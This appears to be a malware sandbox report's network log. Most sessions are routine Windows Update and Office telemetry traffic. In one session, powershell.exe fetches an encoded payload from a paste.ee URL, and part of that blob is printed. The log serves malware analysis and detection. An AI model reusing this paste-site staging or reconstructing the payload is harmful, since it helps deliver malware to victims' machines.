                                                                                2024-10-04 09:33:50 UTC16384INData Raw: 20 20 20 20 3c 53 20 54 3d 22 33 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 39 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 50 61 69 6e 74 5f 49 4d 73 6f 50 65 72 73 6f 6e 61 5f 57 61 73 4e 75 6c 6c 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 33 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 32 30 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 50 61 69 6e 74 5f 49 4d 73 6f 50 65 72 73 6f 6e 61 5f 4e 75 6c 6c 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 33 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a
                                                                                Data Ascii: <S T="31" /> </C> </C> <C T="U32" I="19" O="false" N="Paint_IMsoPersona_WasNull_Count"> <C> <S T="32" /> </C> </C> <C T="U32" I="20" O="false" N="Paint_IMsoPersona_Null_Count"> <C> <S T="33" /> </C>
                                                                                2024-10-04 09:33:50 UTC16384INData Raw: 20 3c 53 20 54 3d 22 33 22 20 46 3d 22 52 65 74 72 69 65 76 61 6c 4d 69 6c 6c 69 73 65 63 6f 6e 64 73 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 32 30 30 22 20 54 3d 22 49 36 34 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 4c 54 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 33 22 20 46 3d 22 52 65 74 72 69 65 76 61 6c 4d 69 6c 6c 69 73 65 63
                                                                                Data Ascii: <S T="3" F="RetrievalMilliseconds" /> </L> <R> <V V="200" T="I64" /> </R> </O> </L> <R> <O T="LT"> <L> <S T="3" F="RetrievalMillisec
                                                                                2024-10-04 09:33:50 UTC16384INData Raw: 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 30 22 20 54 3d 22 49 33 32 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 3c 2f 46 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 30 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 4f 63 6f 6d 32 49 55 43 4f 66 66 69 63 65 49 6e 74 65 67 72 61 74 69 6f 6e 46 69 72 73 74 43 61 6c 6c 53 75 63 63 65 73 73 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 4f 63 6f 6d 32 49 55 43 4f 66 66 69 63 65 49 6e
                                                                                Data Ascii: R> <V V="0" T="I32" /> </R> </O> </F> </S> <C T="U32" I="0" O="false" N="Ocom2IUCOfficeIntegrationFirstCallSuccessCount"> <C> <S T="9" /> </C> </C> <C T="U32" I="1" O="false" N="Ocom2IUCOfficeIn
                                                                                2024-10-04 09:33:50 UTC16384INData Raw: 52 3e 0d 0a 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 3c 2f 46 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 36 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 41 4e 44 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 33 22 20 46 3d 22 54 65 6e 61 6e 74 20 65 6e 61 62 6c 65 64 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 33 22 20 46 3d 22 55 73 65 72 20 65 6e 61 62 6c 65 64 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                Data Ascii: R> </O> </F> <F T="6"> <O T="AND"> <L> <S T="3" F="Tenant enabled" /> </L> <R> <O T="EQ"> <L> <S T="3" F="User enabled" /> </L>
                                                                                2024-10-04 09:33:50 UTC16384INData Raw: 54 3d 22 36 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 32 22 20 46 3d 22 48 74 74 70 53 74 61 74 75 73 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 34 30 34 22 20 54 3d 22 55 33 32 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 3c 2f 46 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 37 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 41 4e 44 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 47 45 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c
                                                                                Data Ascii: T="6"> <O T="EQ"> <L> <S T="2" F="HttpStatus" /> </L> <R> <V V="404" T="U32" /> </R> </O> </F> <F T="7"> <O T="AND"> <L> <O T="GE"> <


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                2192.168.2.5497064.175.87.197443
                                                                                TimestampBytes transferredDirectionData
                                                                                2024-10-04 09:33:50 UTC306OUTGET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=dx+SZ2r9+LVmadL&MD=TD8vCUGP HTTP/1.1
                                                                                Connection: Keep-Alive
                                                                                Accept: */*
                                                                                User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33
                                                                                Host: slscr.update.microsoft.com
                                                                                2024-10-04 09:33:50 UTC560INHTTP/1.1 200 OK
                                                                                Cache-Control: no-cache
                                                                                Pragma: no-cache
                                                                                Content-Type: application/octet-stream
                                                                                Expires: -1
                                                                                Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT
                                                                                ETag: "XAopazV00XDWnJCwkmEWRv6JkbjRA9QSSZ2+e/3MzEk=_2880"
                                                                                MS-CorrelationId: 3ed496d1-a03b-43e3-bf2d-a620b7ace979
                                                                                MS-RequestId: 18fee26c-ff60-46ba-835c-2292b1697cf1
                                                                                MS-CV: RtN6voQFrE2FGnia.0
                                                                                X-Microsoft-SLSClientCache: 2880
                                                                                Content-Disposition: attachment; filename=environment.cab
                                                                                X-Content-Type-Options: nosniff
                                                                                Date: Fri, 04 Oct 2024 09:33:49 GMT
                                                                                Connection: close
                                                                                Content-Length: 24490
                                                                                2024-10-04 09:33:50 UTC15824INData Raw: 4d 53 43 46 00 00 00 00 92 1e 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 23 d0 00 00 14 00 00 00 00 00 10 00 92 1e 00 00 18 41 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 e6 42 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 78 cf 8d 5c 26 1e e6 42 43 4b ed 5c 07 54 13 db d6 4e a3 f7 2e d5 d0 3b 4c 42 af 4a 57 10 e9 20 bd 77 21 94 80 88 08 24 2a 02 02 d2 55 10 a4 a8 88 97 22 8a 0a d2 11 04 95 ae d2 8b 20 28 0a 88 20 45 05 f4 9f 80 05 bd ed dd f7 ff 77 dd f7 bf 65 d6 4a 66 ce 99 33 67 4e d9 7b 7f fb db 7b 56 f4 4d 34 b4 21 e0 a7 03 0a d9 fc 68 6e 1d 20 70 28 14 02 85 20 20 ad 61 10 08 e3 66 0d ed 66 9b 1d 6a 90 af 1f 17 f0 4b 68 35 01 83 6c fb 44 42 5c 7d 83 3d 03 30 be 3e ae be 58
                                                                                Data Ascii: MSCFD#AdBenvironment.cabx\&BCK\TN.;LBJW w!$*U" ( EweJf3gN{{VM4!hn p( affjKh5lDB\}=0>X
                                                                                2024-10-04 09:33:50 UTC8666INData Raw: 04 01 31 2f 30 2d 30 0a 02 05 00 e1 2b 8a 50 02 01 00 30 0a 02 01 00 02 02 12 fe 02 01 ff 30 07 02 01 00 02 02 11 e6 30 0a 02 05 00 e1 2c db d0 02 01 00 30 36 06 0a 2b 06 01 04 01 84 59 0a 04 02 31 28 30 26 30 0c 06 0a 2b 06 01 04 01 84 59 0a 03 02 a0 0a 30 08 02 01 00 02 03 07 a1 20 a1 0a 30 08 02 01 00 02 03 01 86 a0 30 0d 06 09 2a 86 48 86 f7 0d 01 01 05 05 00 03 81 81 00 0c d9 08 df 48 94 57 65 3e ad e7 f2 17 9c 1f ca 3d 4d 6c cd 51 e1 ed 9c 17 a5 52 35 0f fd de 4b bd 22 92 c5 69 e5 d7 9f 29 23 72 40 7a ca 55 9d 8d 11 ad d5 54 00 bb 53 b4 87 7b 72 84 da 2d f6 e3 2c 4f 7e ba 1a 58 88 6e d6 b9 6d 16 ae 85 5b b5 c2 81 a8 e0 ee 0a 9c 60 51 3a 7b e4 61 f8 c3 e4 38 bd 7d 28 17 d6 79 f0 c8 58 c6 ef 1f f7 88 65 b1 ea 0a c0 df f7 ee 5c 23 c2 27 fd 98 63 08 31
                                                                                Data Ascii: 1/0-0+P000,06+Y1(0&0+Y0 00*HHWe>=MlQR5K"i)#r@zUTS{r-,O~Xnm[`Q:{a8}(yXe\#'c1


                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                3192.168.2.54971513.107.246.60443
                                                                                TimestampBytes transferredDirectionData
                                                                                2024-10-04 09:33:51 UTC192OUTGET /rules/rule120600v4s19.xml HTTP/1.1
                                                                                Connection: Keep-Alive
                                                                                Accept-Encoding: gzip
                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                Host: otelrules.azureedge.net
                                                                                2024-10-04 09:33:51 UTC563INHTTP/1.1 200 OK
                                                                                Date: Fri, 04 Oct 2024 09:33:51 GMT
                                                                                Content-Type: text/xml
                                                                                Content-Length: 2980
                                                                                Connection: close
                                                                                Vary: Accept-Encoding
                                                                                Vary: Accept-Encoding
                                                                                Vary: Accept-Encoding
                                                                                Vary: Accept-Encoding
                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                Last-Modified: Tue, 09 Apr 2024 00:26:10 GMT
                                                                                ETag: "0x8DC582BA80D96A1"
                                                                                x-ms-request-id: b9d87bc3-001e-008d-128c-15d91e000000
                                                                                x-ms-version: 2018-03-28
                                                                                x-azure-ref: 20241004T093351Z-15767c5fc55tsfp92w7yna557w0000000cc00000000049ut
                                                                                x-fd-int-roxy-purgeid: 0
                                                                                X-Cache: TCP_HIT
                                                                                Accept-Ranges: bytes
                                                                                2024-10-04 09:33:51 UTC2980INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 30 22 20 56 3d 22 34 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 4d 65 74 61 64 61 74 61 44 65 76 69 63 65 43 6f 6e 73 6f 6c 69 64 61 74 65 64 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 44 43 22 20
                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120600" V="4" DC="SM" EN="Office.System.SystemHealthMetadataDeviceConsolidated" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalBusinessImpact" DL="A" DCa="DC"


                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                4192.168.2.54971713.107.246.60443
                                                                                TimestampBytes transferredDirectionData
                                                                                2024-10-04 09:33:51 UTC192OUTGET /rules/rule120608v0s19.xml HTTP/1.1
                                                                                Connection: Keep-Alive
                                                                                Accept-Encoding: gzip
                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                Host: otelrules.azureedge.net
                                                                                2024-10-04 09:33:51 UTC563INHTTP/1.1 200 OK
                                                                                Date: Fri, 04 Oct 2024 09:33:51 GMT
                                                                                Content-Type: text/xml
                                                                                Content-Length: 2160
                                                                                Connection: close
                                                                                Vary: Accept-Encoding
                                                                                Vary: Accept-Encoding
                                                                                Vary: Accept-Encoding
                                                                                Vary: Accept-Encoding
                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                Last-Modified: Tue, 09 Apr 2024 00:26:03 GMT
                                                                                ETag: "0x8DC582BA3B95D81"
                                                                                x-ms-request-id: 39d43082-801e-00ac-658c-15fd65000000
                                                                                x-ms-version: 2018-03-28
                                                                                x-azure-ref: 20241004T093351Z-15767c5fc554w2fgapsyvy8ua00000000bug000000006dms
                                                                                x-fd-int-roxy-purgeid: 0
                                                                                X-Cache: TCP_HIT
                                                                                Accept-Ranges: bytes
                                                                                2024-10-04 09:33:51 UTC2160INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 32 22 20 52 3d 22 31 32 30 36 37 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 33 22 20 52 3d 22 31 32 30 36 31 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 34 22 20 52 3d 22 31 32 30 36 31 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 35 22 20 52 3d 22 31 32 30 36 31 34 22 20 2f 3e 0d 0a 20 20 20
                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120608" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <R T="1" R="120609" /> <R T="2" R="120679" /> <R T="3" R="120610" /> <R T="4" R="120612" /> <R T="5" R="120614" />


                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                5192.168.2.54971313.107.246.60443
                                                                                TimestampBytes transferredDirectionData
                                                                                2024-10-04 09:33:51 UTC193OUTGET /rules/rule120402v21s19.xml HTTP/1.1
                                                                                Connection: Keep-Alive
                                                                                Accept-Encoding: gzip
                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                Host: otelrules.azureedge.net
                                                                                2024-10-04 09:33:51 UTC563INHTTP/1.1 200 OK
                                                                                Date: Fri, 04 Oct 2024 09:33:51 GMT
                                                                                Content-Type: text/xml
                                                                                Content-Length: 3788
                                                                                Connection: close
                                                                                Vary: Accept-Encoding
                                                                                Vary: Accept-Encoding
                                                                                Vary: Accept-Encoding
                                                                                Vary: Accept-Encoding
                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                Last-Modified: Tue, 09 Apr 2024 00:26:17 GMT
                                                                                ETag: "0x8DC582BAC2126A6"
                                                                                x-ms-request-id: 1cc2ff82-e01e-0071-478c-1508e7000000
                                                                                x-ms-version: 2018-03-28
                                                                                x-azure-ref: 20241004T093351Z-15767c5fc55rg5b7sh1vuv8t7n0000000cng0000000072qu
                                                                                x-fd-int-roxy-purgeid: 0
                                                                                X-Cache: TCP_HIT
                                                                                Accept-Ranges: bytes
                                                                                2024-10-04 09:33:51 UTC3788INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 34 30 32 22 20 56 3d 22 32 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 55 6e 67 72 61 63 65 66 75 6c 41 70 70 45 78 69 74 44 65 73 6b 74 6f 70 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 43 65 6e 73 75 73 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 50 53 50 22 20 78 6d 6c 6e 73 3d 22 22
                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120402" V="21" DC="SM" EN="Office.System.SystemHealthUngracefulAppExitDesktop" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalCensus" DL="A" DCa="PSP" xmlns=""


                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                6192.168.2.54971413.107.246.60443
                                                                                TimestampBytes transferredDirectionData
                                                                                2024-10-04 09:33:51 UTC192OUTGET /rules/rule224902v2s19.xml HTTP/1.1
                                                                                Connection: Keep-Alive
                                                                                Accept-Encoding: gzip
                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                Host: otelrules.azureedge.net
                                                                                2024-10-04 09:33:51 UTC470INHTTP/1.1 200 OK
                                                                                Date: Fri, 04 Oct 2024 09:33:51 GMT
                                                                                Content-Type: text/xml
                                                                                Content-Length: 450
                                                                                Connection: close
                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                Last-Modified: Tue, 09 Apr 2024 00:27:25 GMT
                                                                                ETag: "0x8DC582BD4C869AE"
                                                                                x-ms-request-id: b9d87bc4-001e-008d-138c-15d91e000000
                                                                                x-ms-version: 2018-03-28
                                                                                x-azure-ref: 20241004T093351Z-15767c5fc55whfstvfw43u8fp40000000cb000000000b9n3
                                                                                x-fd-int-roxy-purgeid: 0
                                                                                X-Cache: TCP_HIT
                                                                                Accept-Ranges: bytes
                                                                                2024-10-04 09:33:51 UTC450INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 32 32 34 39 30 32 22 20 56 3d 22 32 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 31 30 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 55 54 53 20 54 3d 22 32 22 20 49 64 3d 22 62 62 72 35 71 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 53 20 54 3d 22 33 22 20 47 3d 22 7b 61 33 36 61 39 37 30 64 2d 34 35 61 39 2d 34 65 30 64 2d 39 63 61 62 2d 32 61 32 33 35 63 63 39 64 37 63 36 7d 22 20 2f 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 47 22 20 49 3d 22 30 22 20 4f 3d 22 66 61 6c 73 65 4e
                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="224902" V="2" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120100" /> <UTS T="2" Id="bbr5q" /> <SS T="3" G="{a36a970d-45a9-4e0d-9cab-2a235cc9d7c6}" /> </S> <C T="G" I="0" O="falseN


                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                7192.168.2.54971613.107.246.60443
                                                                                TimestampBytes transferredDirectionData
                                                                                2024-10-04 09:33:51 UTC192OUTGET /rules/rule120609v0s19.xml HTTP/1.1
                                                                                Connection: Keep-Alive
                                                                                Accept-Encoding: gzip
                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                Host: otelrules.azureedge.net
                                                                                2024-10-04 09:33:51 UTC470INHTTP/1.1 200 OK
                                                                                Date: Fri, 04 Oct 2024 09:33:51 GMT
                                                                                Content-Type: text/xml
                                                                                Content-Length: 408
                                                                                Connection: close
                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                Last-Modified: Tue, 09 Apr 2024 00:26:33 GMT
                                                                                ETag: "0x8DC582BB56D3AFB"
                                                                                x-ms-request-id: 4b0a31e7-c01e-00ad-448c-15a2b9000000
                                                                                x-ms-version: 2018-03-28
                                                                                x-azure-ref: 20241004T093351Z-15767c5fc55rg5b7sh1vuv8t7n0000000cs0000000001wh9
                                                                                x-fd-int-roxy-purgeid: 0
                                                                                X-Cache: TCP_HIT
                                                                                Accept-Ranges: bytes
                                                                                2024-10-04 09:33:51 UTC408INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 38 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 44 64 5d 5b 45 65 5d 5b 4c 6c 5d 5b 4c 6c 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20
                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120609" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120682" /> <SR T="2" R="^([Dd][Ee][Ll][Ll])"> <S T="1" F="0" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                8192.168.2.549718188.114.97.34437136C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                2024-10-04 09:33:51 UTC67OUTGET /d/XlUYO/0 HTTP/1.1
                                                                                Host: paste.ee
                                                                                Connection: Keep-Alive
                                                                                2024-10-04 09:33:52 UTC1204INHTTP/1.1 200 OK
                                                                                Date: Fri, 04 Oct 2024 09:33:52 GMT
                                                                                Content-Type: text/plain; charset=utf-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: close
                                                                                Cache-Control: max-age=2592000
                                                                                strict-transport-security: max-age=63072000
                                                                                x-frame-options: DENY
                                                                                x-content-type-options: nosniff
                                                                                x-xss-protection: 1; mode=block
                                                                                content-security-policy: default-src 'self'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://cdnjs.cloudflare.com https://www.google.com https://www.gstatic.com https://analytics.paste.ee; img-src 'self' https://secure.gravatar.com https://analytics.paste.ee data:; style-src 'self' 'unsafe-inline' https://fonts.googleapis.com https://cdnjs.cloudflare.com; font-src 'self' https://themes.googleusercontent.com https://fonts.gstatic.com; frame-src https://www.google.com; object-src 'none'
                                                                                cf-cache-status: DYNAMIC
                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jTjg6cU4lVSWz9sxVpGQoQASrFCLbzc5FGi90LpozrdO2VQzJVECfm0x3mG%2B0dfjR%2BxsE40zCFWIIHW36IwYXvAKztry5V89EV5ktZjNmPcav3tKQkF2me%2Fzww%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                Server: cloudflare
                                                                                CF-RAY: 8cd42c3f1f1f4245-EWR
                                                                                2024-10-04 09:33:52 UTC165INData Raw: 31 66 37 66 0d 0a 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 50 59 79 44 65 38 77 46 50 38 77 44 48 37 67 2f 4f 73 76 44 7a 37 41 36 4f 45 75 44 5a 37 51 30 4f 67 73 44 41 36 77 74 4f 38 71 44
                                                                                Data Ascii: 1f7fAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAPYyDe8wFP8wDH7g/OsvDz7A6OEuDZ7Q0OgsDA6wtO8qD
                                                                                2024-10-04 09:33:52 UTC1369INData Raw: 6e 36 77 6e 4f 63 70 44 4e 36 67 68 4f 41 6b 44 2f 35 67 66 4f 30 6e 44 38 35 77 65 4f 6f 6e 44 6b 7a 51 79 4d 67 49 44 6c 79 41 70 4d 30 4a 44 63 79 77 6d 4d 67 4a 44 53 79 67 6a 4d 6f 49 44 47 79 67 51 4d 59 48 44 79 78 51 63 4d 41 48 44 76 78 67 62 4d 30 47 44 73 78 77 61 4d 6f 47 44 6e 78 67 5a 4d 55 47 44 6b 78 77 59 4d 49 47 44 68 78 41 59 4d 38 46 44 65 78 67 57 4d 6b 46 44 59 41 41 41 41 4d 43 67 42 67 44 41 41 41 6f 44 56 36 41 6b 4f 34 6f 44 4a 36 77 68 4f 55 6f 44 44 36 67 67 4f 41 6b 44 37 35 51 65 4f 51 6e 44 79 35 41 63 4f 34 6d 44 74 35 41 62 4f 73 6d 44 71 35 41 61 4f 63 6d 44 6c 35 41 59 4f 34 6c 44 5a 35 77 56 4f 55 6c 44 54 35 67 53 4f 67 6b 44 47 35 51 42 4f 34 6a 44 32 34 51 4e 4f 34 69 44 6d 34 67 48 4f 59 68 44 4f 34 67 78 4e 34 66
